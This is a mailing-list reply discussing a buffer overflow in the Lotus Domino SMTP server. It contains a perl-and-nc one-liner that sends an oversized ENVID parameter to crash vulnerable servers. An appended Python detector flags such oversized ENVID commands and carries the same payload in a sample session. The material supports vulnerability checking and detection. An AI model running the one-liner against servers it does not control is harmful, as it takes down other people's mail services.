Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server
> However, Lotus Notes/Domino Release 5.0.4 QMR fix list indicates that
> the problem was already fixed in 5.04.
>
> See
>
> http://www.support.lotus.com/sims2.nsf/802ee480bdd32d0b852566fa005acf8d/191a4daad1890947852569580069a59d?OpenDocument&Highlight=2,ENVID
>
> and click on
> Mail Server - Router - SMTP
>
> The SPR# is CDOY4GFP35
>
> Are you sure 5.04 is affected? Or the technote is lying?
>
Well, at least the eval. version for the Linux platform is vulnerable.
If you want to be confident whether it affects your server or not,
here's a small hint to play around with: :-)
perl -e 'print "ehlo foo\nmail from:blah@yahoo.com\nrcpt to:admin@localhost
ENVID=", "A"x900;' | nc lotus.box 25
or something like that.. :)
If all your Lotus services get frozen afterwards, you are vulnerable.
-Fyodor
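
A defensive counterpart to the hint above, as an added example that is not part of the original post: a Python check that flags SMTP command lines carrying an oversized or misplaced ENVID parameter, run over a constructed session. The function names, the 100-character ENVID ceiling and the choice to enforce the base 512-character line limit are assumptions of this example.

```python
import re

MAX_LINE = 512   # RFC 5321 base command-line limit incl. CRLF (assumes no extension raises it)
MAX_ENVID = 100  # assumed policy ceiling for an ENVID value; tune per site
PARAM_RE = re.compile(r"([A-Za-z0-9][A-Za-z0-9-]*)=(\S*)")  # ESMTP KEYWORD=value token

def check_smtp_line(line):
    """Return a list of findings for one client SMTP command line."""
    findings = []
    body = line.rstrip("\r\n")
    if len(body) + 2 > MAX_LINE:
        findings.append(f"command line is {len(body) + 2} chars (limit {MAX_LINE})")
    tokens = body.split()
    verb = tokens[0].upper() if tokens else ""
    if verb not in ("MAIL", "RCPT"):
        return findings  # ESMTP parameters are only parsed on MAIL and RCPT
    for tok in tokens[1:]:
        m = PARAM_RE.fullmatch(tok)
        if not m or m.group(1).upper() != "ENVID":
            continue
        if verb == "RCPT":
            # RFC 3461 defines ENVID for MAIL; on RCPT it is already anomalous.
            findings.append("ENVID on RCPT (defined for MAIL only)")
        if len(m.group(2)) > MAX_ENVID:
            findings.append(f"ENVID value is {len(m.group(2))} chars (limit {MAX_ENVID})")
    return findings

def scan_session(lines):
    """Return (line number, finding) pairs for a captured client-side session."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in check_smtp_line(line)]

# Constructed sample session: two well-formed DSN commands, then an oversized ENVID.
SAMPLE_SESSION = [
    "EHLO client.example",
    "MAIL FROM:<alice@example.org> ENVID=QQ314159 RET=HDRS",
    "RCPT TO:<bob@example.net> NOTIFY=FAILURE",
    "RCPT TO:<admin@localhost> ENVID=" + "A" * 900,
]

if __name__ == "__main__":
    for n, finding in scan_session(SAMPLE_SESSION):
        print(f"line {n}: {finding}")
```

The line-length check also catches the case where the long parameter arrives on a line of its own, which the ENVID parser alone would skip.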